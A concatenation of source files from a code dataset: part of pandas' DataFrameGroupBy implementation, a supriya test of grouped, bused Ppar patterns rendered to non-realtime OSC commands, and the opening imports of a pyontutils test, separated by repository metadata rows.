class DataFrameGroupBy(GroupBy[DataFrame]):
_apply_allowlist = base.dataframe_apply_allowlist
_agg_examples_doc = dedent(
"""
Examples
--------
>>> df = pd.DataFrame(
... {
... "A": [1, 1, 2, 2],
... "B": [1, 2, 3, 4],
... "C": [0.362838, 0.227877, 1.267767, -0.562860],
... }
... )
>>> df
A B C
0 1 1 0.362838
1 1 2 0.227877
2 2 3 1.267767
3 2 4 -0.562860
The aggregation is for each column.
>>> df.groupby('A').agg('min')
B C
A
1 1 0.227877
2 3 -0.562860
Multiple aggregations
>>> df.groupby('A').agg(['min', 'max'])
B C
min max min max
A
1 1 2 0.227877 0.362838
2 3 4 -0.562860 1.267767
Select a column for aggregation
>>> df.groupby('A').B.agg(['min', 'max'])
min max
A
1 1 2
2 3 4
Different aggregations per column
>>> df.groupby('A').agg({'B': ['min', 'max'], 'C': 'sum'})
B C
min max sum
A
1 1 2 0.590715
2 3 4 0.704907
To control the output names with different aggregations per column,
pandas supports "named aggregation"
>>> df.groupby("A").agg(
... b_min=pd.NamedAgg(column="B", aggfunc="min"),
... c_sum=pd.NamedAgg(column="C", aggfunc="sum"))
b_min c_sum
A
1 1 0.590715
2 3 0.704907
- The keywords are the *output* column names
- The values are tuples whose first element is the column to select
and the second element is the aggregation to apply to that column.
Pandas provides the ``pandas.NamedAgg`` namedtuple with the fields
``['column', 'aggfunc']`` to make it clearer what the arguments are.
As usual, the aggregation can be a callable or a string alias.
See :ref:`groupby.aggregate.named` for more.
.. versionchanged:: 1.3.0
The resulting dtype will reflect the return value of the aggregating function.
>>> df.groupby("A")[["B"]].agg(lambda x: x.astype(float).min())
B
A
1 1.0
2 3.0"""
)
@doc(_agg_template, examples=_agg_examples_doc, klass="DataFrame")
def aggregate(self, func=None, *args, engine=None, engine_kwargs=None, **kwargs):
if maybe_use_numba(engine):
with group_selection_context(self):
data = self._selected_obj
result, index = self._aggregate_with_numba(
data, func, *args, engine_kwargs=engine_kwargs, **kwargs
)
return self.obj._constructor(result, index=index, columns=data.columns)
relabeling, func, columns, order = reconstruct_func(func, **kwargs)
func = maybe_mangle_lambdas(func)
op = GroupByApply(self, func, args, kwargs)
result = op.agg()
if not is_dict_like(func) and result is not None:
return result
elif relabeling and result is not None:
# this should be the only (non-raising) case with relabeling
# used reordered index of columns
result = result.iloc[:, order]
result.columns = columns
if result is None:
# grouper specific aggregations
if self.grouper.nkeys > 1:
# test_groupby_as_index_series_scalar gets here with 'not self.as_index'
return self._python_agg_general(func, *args, **kwargs)
elif args or kwargs:
# test_pass_args_kwargs gets here (with and without as_index)
# can't return early
result = self._aggregate_frame(func, *args, **kwargs)
elif self.axis == 1:
# _aggregate_multiple_funcs does not allow self.axis == 1
# Note: axis == 1 precludes 'not self.as_index', see __init__
result = self._aggregate_frame(func)
return result
else:
# try to treat as if we are passing a list
gba = GroupByApply(self, [func], args=(), kwargs={})
try:
result = gba.agg()
except ValueError as err:
if "no results" not in str(err):
# raised directly by _aggregate_multiple_funcs
raise
result = self._aggregate_frame(func)
else:
sobj = self._selected_obj
if isinstance(sobj, Series):
# GH#35246 test_groupby_as_index_select_column_sum_empty_df
result.columns = [sobj.name]
else:
# select everything except for the last level, which is the one
# containing the name of the function(s), see GH#32040
result.columns = result.columns.rename(
[sobj.columns.name] * result.columns.nlevels
).droplevel(-1)
if not self.as_index:
self._insert_inaxis_grouper_inplace(result)
result.index = Index(range(len(result)))
return result._convert(datetime=True)
agg = aggregate
def _iterate_slices(self) -> Iterable[Series]:
obj = self._selected_obj
if self.axis == 1:
obj = obj.T
if isinstance(obj, Series) and obj.name not in self.exclusions:
# Occurs when doing DataFrameGroupBy(...)["X"]
yield obj
else:
for label, values in obj.items():
if label in self.exclusions:
continue
yield values
def _cython_agg_general(
self, how: str, alt: Callable, numeric_only: bool, min_count: int = -1
) -> DataFrame:
# Note: we never get here with how="ohlc"; that goes through SeriesGroupBy
data: Manager2D = self._get_data_to_aggregate()
orig = data
if numeric_only:
data = data.get_numeric_data(copy=False)
def array_func(values: ArrayLike) -> ArrayLike:
try:
result = self.grouper._cython_operation(
"aggregate", values, how, axis=data.ndim - 1, min_count=min_count
)
except NotImplementedError:
# generally if we have numeric_only=False
# and non-applicable functions
# try to python agg
# TODO: shouldn't min_count matter?
result = self._agg_py_fallback(values, ndim=data.ndim, alt=alt)
return result
# TypeError -> we may have an exception in trying to aggregate
# continue and exclude the block
new_mgr = data.grouped_reduce(array_func, ignore_failures=True)
if not len(new_mgr) and len(orig):
# If the original Manager was already empty, no need to raise
raise DataError("No numeric types to aggregate")
if len(new_mgr) < len(data):
warnings.warn(
f"Dropping invalid columns in {type(self).__name__}.{how} "
"is deprecated. In a future version, a TypeError will be raised. "
f"Before calling .{how}, select only columns which should be "
"valid for the function.",
FutureWarning,
stacklevel=4,
)
return self._wrap_agged_manager(new_mgr)
def _aggregate_frame(self, func, *args, **kwargs) -> DataFrame:
if self.grouper.nkeys != 1:
raise AssertionError("Number of keys must be 1")
obj = self._obj_with_exclusions
result: dict[Hashable, NDFrame | np.ndarray] = {}
if self.axis == 0:
# test_pass_args_kwargs_duplicate_columns gets here with non-unique columns
for name, data in self:
fres = func(data, *args, **kwargs)
result[name] = fres
else:
# we get here in a number of test_multilevel tests
for name in self.indices:
grp_df = self.get_group(name, obj=obj)
fres = func(grp_df, *args, **kwargs)
result[name] = fres
result_index = self.grouper.result_index
other_ax = obj.axes[1 - self.axis]
out = self.obj._constructor(result, index=other_ax, columns=result_index)
if self.axis == 0:
out = out.T
return out
def _aggregate_item_by_item(self, func, *args, **kwargs) -> DataFrame:
# only for axis==0
# tests that get here with non-unique cols:
# test_resample_with_timedelta_yields_no_empty_groups,
# test_resample_apply_product
obj = self._obj_with_exclusions
result: dict[int | str, NDFrame] = {}
for i, item in enumerate(obj):
ser = obj.iloc[:, i]
colg = SeriesGroupBy(
ser, selection=item, grouper=self.grouper, exclusions=self.exclusions
)
result[i] = colg.aggregate(func, *args, **kwargs)
res_df = self.obj._constructor(result)
res_df.columns = obj.columns
return res_df
def _wrap_applied_output(self, data, keys, values, not_indexed_same=False):
if len(keys) == 0:
result = self.obj._constructor(
index=self.grouper.result_index, columns=data.columns
)
result = result.astype(data.dtypes.to_dict(), copy=False)
return result
# GH12824
first_not_none = next(com.not_none(*values), None)
if first_not_none is None:
# GH9684 - All values are None, return an empty frame.
return self.obj._constructor()
elif isinstance(first_not_none, DataFrame):
return self._concat_objects(keys, values, not_indexed_same=not_indexed_same)
key_index = self.grouper.result_index if self.as_index else None
if isinstance(first_not_none, (np.ndarray, Index)):
# GH#1738: values is list of arrays of unequal lengths
# fall through to the outer else clause
# TODO: sure this is right? we used to do this
# after raising AttributeError above
return self.obj._constructor_sliced(
values, index=key_index, name=self._selection
)
elif not isinstance(first_not_none, Series):
# values are not series or array-like but scalars
# self._selection not passed through to Series as the
# result should not take the name of original selection
# of columns
if self.as_index:
return self.obj._constructor_sliced(values, index=key_index)
else:
result = self.obj._constructor(
values, index=key_index, columns=[self._selection]
)
self._insert_inaxis_grouper_inplace(result)
return result
else:
# values are Series
return self._wrap_applied_output_series(
keys, values, not_indexed_same, first_not_none, key_index
)
def _wrap_applied_output_series(
self,
keys,
values: list[Series],
not_indexed_same: bool,
first_not_none,
key_index,
) -> FrameOrSeriesUnion:
# this is to silence a DeprecationWarning
# TODO: Remove when default dtype of empty Series is object
kwargs = first_not_none._construct_axes_dict()
backup = create_series_with_explicit_dtype(dtype_if_empty=object, **kwargs)
values = [x if (x is not None) else backup for x in values]
all_indexed_same = all_indexes_same(x.index for x in values)
# GH3596
# provide a reduction (Frame -> Series) if groups are
# unique
if self.squeeze:
applied_index = self._selected_obj._get_axis(self.axis)
singular_series = len(values) == 1 and applied_index.nlevels == 1
# assign the name to this series
if singular_series:
values[0].name = keys[0]
# GH2893
# we have series in the values array, we want to
# produce a series:
# if any of the sub-series are not indexed the same
# OR we don't have a multi-index and we have only a
# single values
return self._concat_objects(
keys, values, not_indexed_same=not_indexed_same
)
# still a series
# path added as of GH 5545
elif all_indexed_same:
from pandas.core.reshape.concat import concat
return concat(values)
if not all_indexed_same:
# GH 8467
return self._concat_objects(keys, values, not_indexed_same=True)
# Combine values
# vstack+constructor is faster than concat and handles MI-columns
stacked_values = np.vstack([np.asarray(v) for v in values])
if self.axis == 0:
index = key_index
columns = first_not_none.index.copy()
if columns.name is None:
# GH6124 - propagate name of Series when it's consistent
names = {v.name for v in values}
if len(names) == 1:
columns.name = list(names)[0]
else:
index = first_not_none.index
columns = key_index
stacked_values = stacked_values.T
if stacked_values.dtype == object:
# We'll have the DataFrame constructor do inference
stacked_values = stacked_values.tolist()
result = self.obj._constructor(stacked_values, index=index, columns=columns)
if not self.as_index:
self._insert_inaxis_grouper_inplace(result)
return self._reindex_output(result)
def _cython_transform(
self, how: str, numeric_only: bool = True, axis: int = 0, **kwargs
) -> DataFrame:
assert axis == 0 # handled by caller
# TODO: no tests with self.ndim == 1 for DataFrameGroupBy
# With self.axis == 0, we have multi-block tests
# e.g. test_rank_min_int, test_cython_transform_frame
# test_transform_numeric_ret
# With self.axis == 1, _get_data_to_aggregate does a transpose
# so we always have a single block.
mgr: Manager2D = self._get_data_to_aggregate()
if numeric_only:
mgr = mgr.get_numeric_data(copy=False)
def arr_func(bvalues: ArrayLike) -> ArrayLike:
return self.grouper._cython_operation(
"transform", bvalues, how, 1, **kwargs
)
# We could use `mgr.apply` here and not have to set_axis, but
# we would have to do shape gymnastics for ArrayManager compat
res_mgr = mgr.grouped_reduce(arr_func, ignore_failures=True)
res_mgr.set_axis(1, mgr.axes[1])
if len(res_mgr) < len(mgr):
warnings.warn(
f"Dropping invalid columns in {type(self).__name__}.{how} "
"is deprecated. In a future version, a TypeError will be raised. "
f"Before calling .{how}, select only columns which should be "
"valid for the transforming function.",
FutureWarning,
stacklevel=4,
)
res_df = self.obj._constructor(res_mgr)
if self.axis == 1:
res_df = res_df.T
return res_df
def _transform_general(self, func, *args, **kwargs):
from pandas.core.reshape.concat import concat
applied = []
obj = self._obj_with_exclusions
gen = self.grouper.get_iterator(obj, axis=self.axis)
fast_path, slow_path = self._define_paths(func, *args, **kwargs)
for name, group in gen:
object.__setattr__(group, "name", name)
# Try slow path and fast path.
try:
path, res = self._choose_path(fast_path, slow_path, group)
except TypeError:
return self._transform_item_by_item(obj, fast_path)
except ValueError as err:
msg = "transform must return a scalar value for each group"
raise ValueError(msg) from err
if isinstance(res, Series):
# we need to broadcast across the
# other dimension; this will preserve dtypes
# GH14457
if not np.prod(group.shape):
continue
elif res.index.is_(obj.index):
r = concat([res] * len(group.columns), axis=1)
r.columns = group.columns
r.index = group.index
else:
r = self.obj._constructor(
np.concatenate([res.values] * len(group.index)).reshape(
group.shape
),
columns=group.columns,
index=group.index,
)
applied.append(r)
else:
applied.append(res)
concat_index = obj.columns if self.axis == 0 else obj.index
other_axis = 1 if self.axis == 0 else 0 # switches between 0 & 1
concatenated = concat(applied, axis=self.axis, verify_integrity=False)
concatenated = concatenated.reindex(concat_index, axis=other_axis, copy=False)
return self._set_result_index_ordered(concatenated)
@Substitution(klass="DataFrame")
@Appender(_transform_template)
def transform(self, func, *args, engine=None, engine_kwargs=None, **kwargs):
return self._transform(
func, *args, engine=engine, engine_kwargs=engine_kwargs, **kwargs
)
def _can_use_transform_fast(self, result) -> bool:
return isinstance(result, DataFrame) and result.columns.equals(
self._obj_with_exclusions.columns
)
def _wrap_transform_fast_result(self, result: DataFrame) -> DataFrame:
"""
Fast transform path for aggregations
"""
obj = self._obj_with_exclusions
# for each col, reshape to size of original frame by take operation
ids, _, _ = self.grouper.group_info
result = result.reindex(self.grouper.result_index, copy=False)
output = result.take(ids, axis=0)
output.index = obj.index
return output
def _define_paths(self, func, *args, **kwargs):
if isinstance(func, str):
fast_path = lambda group: getattr(group, func)(*args, **kwargs)
slow_path = lambda group: group.apply(
lambda x: getattr(x, func)(*args, **kwargs), axis=self.axis
)
else:
fast_path = lambda group: func(group, *args, **kwargs)
slow_path = lambda group: group.apply(
lambda x: func(x, *args, **kwargs), axis=self.axis
)
return fast_path, slow_path
def _choose_path(self, fast_path: Callable, slow_path: Callable, group: DataFrame):
path = slow_path
res = slow_path(group)
# if we make it here, test if we can use the fast path
try:
res_fast = fast_path(group)
except AssertionError:
raise # pragma: no cover
except Exception:
# GH#29631 For user-defined function, we can't predict what may be
# raised; see test_transform.test_transform_fastpath_raises
return path, res
# verify fast path does not change columns (and names), otherwise
# its results cannot be joined with those of the slow path
if not isinstance(res_fast, DataFrame):
return path, res
if not res_fast.columns.equals(group.columns):
return path, res
if res_fast.equals(res):
path = fast_path
return path, res
def _transform_item_by_item(self, obj: DataFrame, wrapper) -> DataFrame:
# iterate through columns, see test_transform_exclude_nuisance
# gets here with non-unique columns
output = {}
inds = []
for i, col in enumerate(obj):
subset = obj.iloc[:, i]
sgb = SeriesGroupBy(
subset,
selection=col,
grouper=self.grouper,
exclusions=self.exclusions,
)
try:
output[i] = sgb.transform(wrapper)
except TypeError:
# e.g. trying to call nanmean with string values
warnings.warn(
f"Dropping invalid columns in {type(self).__name__}.transform "
"is deprecated. In a future version, a TypeError will be raised. "
"Before calling .transform, select only columns which should be "
"valid for the transforming function.",
FutureWarning,
stacklevel=5,
)
else:
inds.append(i)
if not output:
raise TypeError("Transform function invalid for data types")
columns = obj.columns.take(inds)
result = self.obj._constructor(output, index=obj.index)
result.columns = columns
return result
def filter(self, func, dropna=True, *args, **kwargs):
"""
Return a copy of a DataFrame excluding filtered elements.
Elements from groups are filtered if they do not satisfy the
boolean criterion specified by func.
Parameters
----------
func : function
Function to apply to each subframe. Should return True or False.
dropna : Drop groups that do not pass the filter. True by default;
If False, groups that evaluate False are filled with NaNs.
Returns
-------
filtered : DataFrame
Notes
-----
Each subframe is endowed with the attribute 'name' in case you need to know
which group you are working on.
Functions that mutate the passed object can produce unexpected
behavior or errors and are not supported. See :ref:`gotchas.udf-mutation`
for more details.
Examples
--------
>>> df = pd.DataFrame({'A' : ['foo', 'bar', 'foo', 'bar',
... 'foo', 'bar'],
... 'B' : [1, 2, 3, 4, 5, 6],
... 'C' : [2.0, 5., 8., 1., 2., 9.]})
>>> grouped = df.groupby('A')
>>> grouped.filter(lambda x: x['B'].mean() > 3.)
A B C
1 bar 2 5.0
3 bar 4 1.0
5 bar 6 9.0
"""
indices = []
obj = self._selected_obj
gen = self.grouper.get_iterator(obj, axis=self.axis)
for name, group in gen:
object.__setattr__(group, "name", name)
res = func(group, *args, **kwargs)
try:
res = res.squeeze()
except AttributeError: # allow e.g., scalars and frames to pass
pass
# interpret the result of the filter
if is_bool(res) or (is_scalar(res) and isna(res)):
if res and notna(res):
indices.append(self._get_index(name))
else:
# non scalars aren't allowed
raise TypeError(
f"filter function returned a {type(res).__name__}, "
"but expected a scalar bool"
)
return self._apply_filter(indices, dropna)
def __getitem__(self, key) -> DataFrameGroupBy | SeriesGroupBy:
if self.axis == 1:
# GH 37725
raise ValueError("Cannot subset columns when using axis=1")
# per GH 23566
if isinstance(key, tuple) and len(key) > 1:
# if len == 1, then it becomes a SeriesGroupBy and this is actually
# valid syntax, so don't raise warning
warnings.warn(
"Indexing with multiple keys (implicitly converted to a tuple "
"of keys) will be deprecated, use a list instead.",
FutureWarning,
stacklevel=2,
)
return super().__getitem__(key)
def _gotitem(self, key, ndim: int, subset=None):
"""
sub-classes to define
return a sliced object
Parameters
----------
key : string / list of selections
ndim : {1, 2}
requested ndim of result
subset : object, default None
subset to act on
"""
if ndim == 2:
if subset is None:
subset = self.obj
return DataFrameGroupBy(
subset,
self.grouper,
axis=self.axis,
level=self.level,
grouper=self.grouper,
exclusions=self.exclusions,
selection=key,
as_index=self.as_index,
sort=self.sort,
group_keys=self.group_keys,
squeeze=self.squeeze,
observed=self.observed,
mutated=self.mutated,
dropna=self.dropna,
)
elif ndim == 1:
if subset is None:
subset = self.obj[key]
return SeriesGroupBy(
subset,
level=self.level,
grouper=self.grouper,
selection=key,
sort=self.sort,
group_keys=self.group_keys,
squeeze=self.squeeze,
observed=self.observed,
dropna=self.dropna,
)
raise AssertionError("invalid ndim for _gotitem")
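# For example, df.groupby("A")[["B", "C"]] reaches this method with ndim=2 and
# key=["B", "C"] (returning a DataFrameGroupBy), while df.groupby("A")["B"]
# arrives with ndim=1 and returns a SeriesGroupBy ("df" here is hypothetical).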
def _get_data_to_aggregate(self) -> Manager2D:
obj = self._obj_with_exclusions
if self.axis == 1:
return obj.T._mgr
else:
return obj._mgr
def _insert_inaxis_grouper_inplace(self, result: DataFrame) -> None:
# zip in reverse so we can always insert at loc 0
columns = result.columns
for name, lev, in_axis in zip(
reversed(self.grouper.names),
reversed(self.grouper.get_group_levels()),
reversed([grp.in_axis for grp in self.grouper.groupings]),
):
# GH #28549
# When using .apply(-), name will be in columns already
if in_axis and name not in columns:
result.insert(0, name, lev)
def _wrap_aggregated_output(
self,
output: Mapping[base.OutputKey, Series | ArrayLike],
) -> DataFrame:
"""
Wraps the output of DataFrameGroupBy aggregations into the expected result.
Parameters
----------
output : Mapping[base.OutputKey, Union[Series, np.ndarray]]
Data to wrap.
Returns
-------
DataFrame
"""
indexed_output = {key.position: val for key, val in output.items()}
columns = Index([key.label for key in output])
columns._set_names(self._obj_with_exclusions._get_axis(1 - self.axis).names)
result = self.obj._constructor(indexed_output)
result.columns = columns
if not self.as_index:
self._insert_inaxis_grouper_inplace(result)
result = result._consolidate()
else:
result.index = self.grouper.result_index
if self.axis == 1:
result = result.T
if result.index.equals(self.obj.index):
# Retain e.g. DatetimeIndex/TimedeltaIndex freq
result.index = self.obj.index.copy()
# TODO: Do this more systematically
return self._reindex_output(result)
def _wrap_transformed_output(
self, output: Mapping[base.OutputKey, Series | ArrayLike]
) -> DataFrame:
"""
Wraps the output of DataFrameGroupBy transformations into the expected result.
Parameters
----------
output : Mapping[base.OutputKey, Union[Series, np.ndarray, ExtensionArray]]
Data to wrap.
Returns
-------
DataFrame
"""
indexed_output = {key.position: val for key, val in output.items()}
result = self.obj._constructor(indexed_output)
if self.axis == 1:
result = result.T
result.columns = self.obj.columns
else:
columns = Index(key.label for key in output)
columns.name = self.obj.columns.name
result.columns = columns
result.index = self.obj.index
return result
def _wrap_agged_manager(self, mgr: Manager2D) -> DataFrame:
if not self.as_index:
index = Index(range(mgr.shape[1]))
mgr.set_axis(1, index)
result = self.obj._constructor(mgr)
self._insert_inaxis_grouper_inplace(result)
result = result._consolidate()
else:
index = self.grouper.result_index
mgr.set_axis(1, index)
result = self.obj._constructor(mgr)
if self.axis == 1:
result = result.T
return self._reindex_output(result)._convert(datetime=True)
def _iterate_column_groupbys(self, obj: FrameOrSeries):
for i, colname in enumerate(obj.columns):
yield colname, SeriesGroupBy(
obj.iloc[:, i],
selection=colname,
grouper=self.grouper,
exclusions=self.exclusions,
)
def _apply_to_column_groupbys(self, func, obj: FrameOrSeries) -> DataFrame:
from pandas.core.reshape.concat import concat
columns = obj.columns
results = [
func(col_groupby) for _, col_groupby in self._iterate_column_groupbys(obj)
]
if not len(results):
# concat would raise
return DataFrame([], columns=columns, index=self.grouper.result_index)
else:
return concat(results, keys=columns, axis=1)
def count(self) -> DataFrame:
"""
Compute count of group, excluding missing values.
Returns
-------
DataFrame
Count of values within each group.
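Examples
--------
A minimal illustrative example (hypothetical frame):
>>> df = pd.DataFrame({"key": ["a", "a", "b"], "val": [1.0, np.nan, 3.0]})
>>> df.groupby("key").count()
     val
key
a      1
b      1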
"""
data = self._get_data_to_aggregate()
ids, _, ngroups = self.grouper.group_info
mask = ids != -1
def hfunc(bvalues: ArrayLike) -> ArrayLike:
# TODO(2DEA): reshape would not be necessary with 2D EAs
if bvalues.ndim == 1:
# EA
masked = mask & ~isna(bvalues).reshape(1, -1)
else:
masked = mask & ~isna(bvalues)
counted = lib.count_level_2d(masked, labels=ids, max_bin=ngroups, axis=1)
return counted
new_mgr = data.grouped_reduce(hfunc)
# If we are grouping on categoricals we want unobserved categories to
# return zero, rather than the default of NaN which the reindexing in
# _wrap_agged_manager() returns. GH 35028
with com.temp_setattr(self, "observed", True):
result = self._wrap_agged_manager(new_mgr)
return self._reindex_output(result, fill_value=0)
def nunique(self, dropna: bool = True) -> DataFrame:
"""
Return DataFrame with counts of unique elements in each position.
Parameters
----------
dropna : bool, default True
Don't include NaN in the counts.
Returns
-------
nunique: DataFrame
Examples
--------
>>> df = pd.DataFrame({'id': ['spam', 'egg', 'egg', 'spam',
... 'ham', 'ham'],
... 'value1': [1, 5, 5, 2, 5, 5],
... 'value2': list('abbaxy')})
>>> df
id value1 value2
0 spam 1 a
1 egg 5 b
2 egg 5 b
3 spam 2 a
4 ham 5 x
5 ham 5 y
>>> df.groupby('id').nunique()
value1 value2
id
egg 1 1
ham 1 2
spam 2 1
Check for rows with the same id but conflicting values:
>>> df.groupby('id').filter(lambda g: (g.nunique() > 1).any())
id value1 value2
0 spam 1 a
3 spam 2 a
4 ham 5 x
5 ham 5 y
"""
if self.axis != 0:
# see test_groupby_crash_on_nunique
return self._python_agg_general(lambda sgb: sgb.nunique(dropna))
obj = self._obj_with_exclusions
results = self._apply_to_column_groupbys(
lambda sgb: sgb.nunique(dropna), obj=obj
)
results.columns.names = obj.columns.names # TODO: do at higher level?
if not self.as_index:
results.index = Index(range(len(results)))
self._insert_inaxis_grouper_inplace(results)
return results
@Appender(DataFrame.idxmax.__doc__)
def idxmax(self, axis=0, skipna: bool = True):
axis = DataFrame._get_axis_number(axis)
numeric_only = None if axis == 0 else False
def func(df):
# NB: here we use numeric_only=None, in DataFrame it is False GH#38217
res = df._reduce(
nanops.nanargmax,
"argmax",
axis=axis,
skipna=skipna,
numeric_only=numeric_only,
)
indices = res._values
index = df._get_axis(axis)
result = [index[i] if i >= 0 else np.nan for i in indices]
return df._constructor_sliced(result, index=res.index)
return self._python_apply_general(func, self._obj_with_exclusions)
@Appender(DataFrame.idxmin.__doc__)
def idxmin(self, axis=0, skipna: bool = True):
axis = DataFrame._get_axis_number(axis)
numeric_only = None if axis == 0 else False
def func(df):
# NB: here we use numeric_only=None, in DataFrame it is False GH#38217
res = df._reduce(
nanops.nanargmin,
"argmin",
axis=axis,
skipna=skipna,
numeric_only=numeric_only,
)
indices = res._values
index = df._get_axis(axis)
result = [index[i] if i >= 0 else np.nan for i in indices]
return df._constructor_sliced(result, index=res.index)
return self._python_apply_general(func, self._obj_with_exclusions)
boxplot = boxplot_frame_groupby
| bsd-3-clause | -8,992,444,320,100,172,000 | 32.947425 | 88 | 0.548184 | false |
Pulgama/supriya | tests/test_patterns_Pgpar_Pfx_Pgroup.py | 1 | 11524 | import pytest
import uqbar.strings
import supriya.assets.synthdefs
import supriya.nonrealtime
import supriya.patterns
import supriya.synthdefs
import supriya.ugens
with supriya.synthdefs.SynthDefBuilder(in_=0, out=0) as builder:
source = supriya.ugens.In.ar(bus=builder["in_"])
source = supriya.ugens.Limiter.ar(source=source)
supriya.ugens.Out.ar(bus=builder["out"], source=source)
limiter_synthdef = builder.build()
pattern_one = supriya.patterns.Ppar(
[
supriya.patterns.Pbind(
duration=1, frequency=supriya.patterns.Pseq([1111, 1112, 1113], 1)
),
supriya.patterns.Pbind(
duration=1, frequency=supriya.patterns.Pseq([2221, 2222, 2223], 1)
),
]
)
pattern_one = pattern_one.with_group()
pattern_one = pattern_one.with_effect(synthdef=limiter_synthdef)
pattern_two = supriya.patterns.Ppar(
[
supriya.patterns.Pbind(
duration=1, frequency=supriya.patterns.Pseq([3331, 3332, 3333], 1)
),
supriya.patterns.Pbind(
duration=1, frequency=supriya.patterns.Pseq([4441, 4442, 4443], 1)
),
]
)
pattern_two = pattern_two.with_group()
pattern_two = pattern_two.with_effect(synthdef=limiter_synthdef)
pattern = supriya.patterns.Pgpar([pattern_one, pattern_two])
pattern = pattern.with_bus()
def test_nonrealtime():
session = supriya.nonrealtime.Session()
with session.at(0):
final_offset = session.inscribe(pattern)
d_recv_commands = pytest.helpers.build_d_recv_commands(
[
supriya.assets.synthdefs.system_link_audio_2,
supriya.assets.synthdefs.default,
limiter_synthdef,
]
)
assert session.to_lists() == [
[
0.0,
[
*d_recv_commands,
["/g_new", 1000, 0, 0],
[
"/s_new",
"38a2c79fc9d58d06e361337163a4e80f",
1001,
3,
1000,
"fade_time",
0.25,
"in_",
16,
],
["/g_new", 1002, 1, 1000],
["/g_new", 1003, 1, 1000],
[
"/s_new",
"38bda0aee6d0e2d4af72be83c09d9b77",
1004,
1,
1002,
"in_",
16,
"out",
16,
],
["/g_new", 1005, 0, 1002],
[
"/s_new",
"da0982184cc8fa54cf9d288a0fe1f6ca",
1006,
0,
1005,
"frequency",
1111,
"out",
16,
],
[
"/s_new",
"da0982184cc8fa54cf9d288a0fe1f6ca",
1007,
0,
1005,
"frequency",
2221,
"out",
16,
],
[
"/s_new",
"38bda0aee6d0e2d4af72be83c09d9b77",
1008,
1,
1003,
"in_",
16,
"out",
16,
],
["/g_new", 1009, 0, 1003],
[
"/s_new",
"da0982184cc8fa54cf9d288a0fe1f6ca",
1010,
0,
1009,
"frequency",
3331,
"out",
16,
],
[
"/s_new",
"da0982184cc8fa54cf9d288a0fe1f6ca",
1011,
0,
1009,
"frequency",
4441,
"out",
16,
],
],
],
[
1.0,
[
[
"/s_new",
"da0982184cc8fa54cf9d288a0fe1f6ca",
1012,
0,
1005,
"frequency",
1112,
"out",
16,
],
[
"/s_new",
"da0982184cc8fa54cf9d288a0fe1f6ca",
1013,
0,
1005,
"frequency",
2222,
"out",
16,
],
[
"/s_new",
"da0982184cc8fa54cf9d288a0fe1f6ca",
1014,
0,
1009,
"frequency",
3332,
"out",
16,
],
[
"/s_new",
"da0982184cc8fa54cf9d288a0fe1f6ca",
1015,
0,
1009,
"frequency",
4442,
"out",
16,
],
["/n_set", 1006, "gate", 0],
["/n_set", 1007, "gate", 0],
["/n_set", 1010, "gate", 0],
["/n_set", 1011, "gate", 0],
],
],
[
2.0,
[
[
"/s_new",
"da0982184cc8fa54cf9d288a0fe1f6ca",
1016,
0,
1005,
"frequency",
1113,
"out",
16,
],
[
"/s_new",
"da0982184cc8fa54cf9d288a0fe1f6ca",
1017,
0,
1005,
"frequency",
2223,
"out",
16,
],
[
"/s_new",
"da0982184cc8fa54cf9d288a0fe1f6ca",
1018,
0,
1009,
"frequency",
3333,
"out",
16,
],
[
"/s_new",
"da0982184cc8fa54cf9d288a0fe1f6ca",
1019,
0,
1009,
"frequency",
4443,
"out",
16,
],
["/n_set", 1012, "gate", 0],
["/n_set", 1013, "gate", 0],
["/n_set", 1014, "gate", 0],
["/n_set", 1015, "gate", 0],
],
],
[
3.0,
[
["/n_set", 1001, "gate", 0],
["/n_set", 1016, "gate", 0],
["/n_set", 1017, "gate", 0],
["/n_set", 1018, "gate", 0],
["/n_set", 1019, "gate", 0],
],
],
[3.25, [["/n_free", 1000, 1002, 1003, 1004, 1005, 1008, 1009], [0]]],
]
assert final_offset == 3.25
def test_to_strings():
session = supriya.nonrealtime.Session()
with session.at(0):
session.inscribe(pattern)
assert session.to_strings(include_controls=True) == uqbar.strings.normalize(
"""
0.0:
NODE TREE 0 group
1000 group
1002 group
1005 group
1007 default
amplitude: 0.1, frequency: 2221.0, gate: 1.0, out: a0, pan: 0.5
1006 default
amplitude: 0.1, frequency: 1111.0, gate: 1.0, out: a0, pan: 0.5
1004 38bda0aee6d0e2d4af72be83c09d9b77
in_: a0, out: a0
1003 group
1009 group
1011 default
amplitude: 0.1, frequency: 4441.0, gate: 1.0, out: a0, pan: 0.5
1010 default
amplitude: 0.1, frequency: 3331.0, gate: 1.0, out: a0, pan: 0.5
1008 38bda0aee6d0e2d4af72be83c09d9b77
in_: a0, out: a0
1001 system_link_audio_2
done_action: 2.0, fade_time: 0.25, gate: 1.0, in_: a0, out: 0.0
1.0:
NODE TREE 0 group
1000 group
1002 group
1005 group
1013 default
amplitude: 0.1, frequency: 2222.0, gate: 1.0, out: a0, pan: 0.5
1012 default
amplitude: 0.1, frequency: 1112.0, gate: 1.0, out: a0, pan: 0.5
1004 38bda0aee6d0e2d4af72be83c09d9b77
in_: 0.0, out: 0.0
1003 group
1009 group
1015 default
amplitude: 0.1, frequency: 4442.0, gate: 1.0, out: a0, pan: 0.5
1014 default
amplitude: 0.1, frequency: 3332.0, gate: 1.0, out: a0, pan: 0.5
1008 38bda0aee6d0e2d4af72be83c09d9b77
in_: 0.0, out: 0.0
1001 system_link_audio_2
done_action: 2.0, fade_time: 0.02, gate: 1.0, in_: 16.0, out: 0.0
2.0:
NODE TREE 0 group
1000 group
1002 group
1005 group
1017 default
amplitude: 0.1, frequency: 2223.0, gate: 1.0, out: a0, pan: 0.5
1016 default
amplitude: 0.1, frequency: 1113.0, gate: 1.0, out: a0, pan: 0.5
1004 38bda0aee6d0e2d4af72be83c09d9b77
in_: 0.0, out: 0.0
1003 group
1009 group
1019 default
amplitude: 0.1, frequency: 4443.0, gate: 1.0, out: a0, pan: 0.5
1018 default
amplitude: 0.1, frequency: 3333.0, gate: 1.0, out: a0, pan: 0.5
1008 38bda0aee6d0e2d4af72be83c09d9b77
in_: 0.0, out: 0.0
1001 system_link_audio_2
done_action: 2.0, fade_time: 0.02, gate: 1.0, in_: 16.0, out: 0.0
3.0:
NODE TREE 0 group
1000 group
1002 group
1005 group
1004 38bda0aee6d0e2d4af72be83c09d9b77
in_: 0.0, out: 0.0
1003 group
1009 group
1008 38bda0aee6d0e2d4af72be83c09d9b77
in_: 0.0, out: 0.0
3.25:
NODE TREE 0 group
"""
)
| mit | -7,873,358,582,196,026,000 | 31.645892 | 95 | 0.342676 | false |
tgbugs/pyontutils | test/test_oboio.py | 1 | 6002 | import os
import shutil
import unittest
import pytest
